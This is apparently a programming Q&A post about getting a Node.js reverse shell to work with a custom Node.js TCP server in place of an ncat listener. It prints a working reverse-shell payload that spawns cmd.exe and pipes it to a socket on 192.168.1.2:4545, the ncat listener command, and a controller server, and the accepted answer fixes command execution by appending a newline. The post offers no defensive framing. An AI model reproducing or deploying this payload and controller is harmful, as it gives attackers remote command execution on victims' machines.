# Nodejs reverse shell with net.socket

Tags: node.js, shell, sockets, websocket, reverse-shell

Good morning everyone i am having a issue with reverse shell in NodeJS when i create socket and listen with netcat its perfectly work but when i create new server with net.Server i receive header of shell but it's not interactive, the shell code is like this :

```
  (function(){
      var net = require("net"),
      child = require("child_process"),
      shell = child.spawn("cmd.exe", []);
      var client = new net.Socket();
      client.connect(4545, "192.168.1.2", function(){      
        client.pipe(shell.stdin);
        shell.stdout.pipe(client);
        shell.stderr.pipe(client);
      });
      return /a/;
  })();
```

and when i listen with netcat i can get the reverse shell

```
ncat -nvlp 4545
```

but the problem arises when I want to create a TCP server in nodejs i receive the banner of cmd.exe but without interactivity

this is the code of server part :

```
    const net = require("net");
let server = new net.Server();

server.listen({ host: '192.168.1.2', port: 4545 }, () => {
  console.log(`Server listen in 4545`);
});

server.on("close", () => {
  console.log('connection closed')
});

server.on("error", (e) => {
  if (e.code === "EADDRINUSE") {
    console.log("Address in use, retrying...");
    setTimeout(() => {
      this.server.close();
      this.server.listen(4545, '192.168.1.2');
    }, 2000);
  }
});

server.on("connection", (socket) => {
  console.log("new connection");

  // HERE I SEND COMMAND WITH ELECTRON JS
  socket.write('command');
  console.log((socket.pipe(socket));

  // Socket is quitted
  socket.on("close", () => {
      console.log('socket closed')
  });

  socket.on("end", () => {
    console.log(`Client ${socket} disconnected`);
    socket.destroy();
  });      

});
```

When i send command example '**dir**' i receive an object with the pipe which is located above in the server
So the question is how can i receive the result of command when i send it, example receiving the file and directory listing of socket

```
 Socket {
    connecting: false,
    _hadError: false,
    _parent: null,
    _host: null,
    _readableState: ReadableState {
      objectMode: false,
      highWaterMark: 16384,
      buffer: BufferList { head: null, tail: null, length: 0 },
      length: 0,
      pipes: [Circular],
      pipesCount: 1,
      flowing: true,
      ended: false,
      endEmitted: false,
      reading: true,
      sync: false,
      needReadable: true,
      emittedReadable: false,
      readableListening: false,
      resumeScheduled: false,
      paused: false,
      emitClose: false,
      autoDestroy: false,
      destroyed: false,
      defaultEncoding: 'utf8',
      awaitDrain: 0,
      readingMore: false,
      decoder: null,
      encoding: null
    },
    readable: true,
    _events: [Object: null prototype] {
      end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
      close: [ [Function], [Function] ],
      data: [ [Function], [Function: ondata] ],
      unpipe: [Function: onunpipe],
      error: [Function: onerror],
      finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
    },
    _eventsCount: 6,
    _maxListeners: undefined,
    _writableState: WritableState {
      objectMode: false,
      highWaterMark: 16384,
      finalCalled: false,
      needDrain: false,
      ending: false,
      ended: false,
      finished: false,
      destroyed: false,
      decodeStrings: false,
      defaultEncoding: 'utf8',
      length: 0,
      writing: false,
      corked: 0,
      sync: false,
      bufferProcessing: false,
      onwrite: [Function: bound onwrite],
      writecb: null,
      writelen: 0,
      afterWriteTickInfo: {
        count: 1,
        cb: [Function: nop],
        stream: [Circular],
        state: [Circular]
      },
      bufferedRequest: null,
      lastBufferedRequest: null,
      pendingcb: 1,
      prefinished: false,
      errorEmitted: false,
      emitClose: false,
      autoDestroy: false,
      bufferedRequestCount: 0,
      corkedRequestsFree: {
        next: null,
        entry: null,
        finish: [Function: bound onCorkedFinish]
      }
    },
    writable: true,
    allowHalfOpen: false,
    _sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
    _pendingData: null,
    _pendingEncoding: '',
    server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4443',
      [Symbol(asyncId)]: 16
    },
    _server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4545',
      [Symbol(asyncId)]: 16
    },
    id: 790,
    _peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
    [Symbol(asyncId)]: 18,
    [Symbol(kHandle)]: TCP {
      reading: true,
      onconnection: null,
      [Symbol(owner)]: [Circular]
    },
    [Symbol(lastWriteQueueSize)]: 0,
    [Symbol(timeout)]: null,
    [Symbol(kBuffer)]: null,
    [Symbol(kBufferCb)]: null,
    [Symbol(kBufferGen)]: null,
    [Symbol(kBytesRead)]: 0,
    [Symbol(kBytesWritten)]: 0
  }
```

Answer (score 0, accepted):

After several attempts I managed to add **\n** in write to enter the code becomes
so the code become

```
socket.write('command'+ '\n');
```